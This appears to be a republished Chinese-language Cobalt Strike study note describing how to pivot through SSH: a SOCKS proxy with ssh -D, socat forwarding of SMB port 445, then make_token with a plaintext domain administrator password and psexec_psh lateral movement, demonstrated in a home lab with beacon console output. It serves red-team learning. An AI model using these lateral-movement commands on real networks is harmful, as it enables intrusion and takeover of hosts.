0x00 前言

這一節(jié)將來介紹如何通過 SSH 通道進(jìn)行攻擊。

0x01 通過 SSH 建立通道

1. 連接到上圖中藍(lán)色區(qū)域里的 PIVOT 主機(jī)并開啟端口轉(zhuǎn)發(fā)

ssh?-D?1080?user@<blue?pivot>

該命令中的 -D 參數(shù)會使 SSH 會建立一個(gè) socket，并去監(jiān)聽本地的 1080 端口，一旦有數(shù)據(jù)傳向那個(gè)端口，就自動把它轉(zhuǎn)移到 SSH 連接上面，隨后發(fā)往遠(yuǎn)程主機(jī)。

2. 在紅色區(qū)域的 PIVOT 主機(jī)上開啟通過 SSH Socks 的 445 端口轉(zhuǎn)發(fā)

socat?TCP4-LISTEN:445,fork?SOCKS4:127.0.0.1:<target>:445

socat 可以理解成 netcat 的加強(qiáng)版。socat 建立 socks 連接默認(rèn)端口就是 1080 ，由于我們上面設(shè)置的就是 1080，因此這里不需變動。如果設(shè)置了其他端口，那么這里還需要在命令最后加上 ,socksport= 指定端口才行。

3. 在攻擊者控制的主機(jī)上運(yùn)行 beacon，使其上線

注意需要使用 administrator 權(quán)限運(yùn)行 beacon

4. 在上線的主機(jī)上運(yùn)行以下命令

make_token [DOMAIN\user] [password]jump?psexec_psh?<red?pivot>?[listener]

整體的流程就是下面這張圖一樣。

0x02 演示

我在本地搭建了這樣的一個(gè)環(huán)境。

1. 首先使 Win1 主機(jī)上線，接著在 Linux1 主機(jī)上通過 SSH 連接到 Linux2 主機(jī)。

ssh?-D?1080?user@192.168.175.146> ssh -D 1080 user@192.168.175.146user@192.168.175.146's password: Last login: Fri Jul 31 20:00:54 2020 from 192.168.175.1user@ubuntu:~$

2. 在 Linux1 主機(jī)上開啟 445 端口轉(zhuǎn)發(fā)

socat TCP4-LISTEN:445,fork SOCKS4:127.0.0.1:192.168.232.132:445

3. 在 Win1 主機(jī)上運(yùn)行以下命令使 Win2 上線

make_token teamssix\administrator Test123!jump?psexec_psh?192.168.175.200?smbbeacon> make_token teamssix\administrator Test123![*] Tasked beacon to create a token for teamssix\administrator[+] host called home, sent: 61 bytes[+] Impersonated WINTEST\Administratorbeacon> jump psexec_psh 192.168.175.200 smb[*] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\msagent_532c) on 192.168.175.200 via Service Control Manager (PSH)[+] host called home, sent: 5886 bytes[+] received output:Started service 4aea3b9 on 192.168.175.200[+] host called home, sent: 204473 bytes[+]?established?link?to?child?beacon:?192.168.232.132

4. 隨后便可以看到通過 SSH 上線的主機(jī)

原文鏈接：https://www.teamssix.com/year/200419-150657.html
參考鏈接：

https://payloads.online/tools/socat

https://www.bilibili.com/video/BV16b411i7n5

https://blog.csdn.net/pipisorry/article/details/52269785

---

---

往期推薦

CS學(xué)習(xí)筆記 | 21、反向轉(zhuǎn)發(fā)通道的建立

CS學(xué)習(xí)筆記 | 20、通過Socks轉(zhuǎn)發(fā)的方法

CS學(xué)習(xí)筆記 | 19、代碼執(zhí)行的方式

總結(jié)

以上是生活随笔為你收集整理的ubuntu 开启ssh_CS学习笔记 | 22、通过SSH开通通道的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。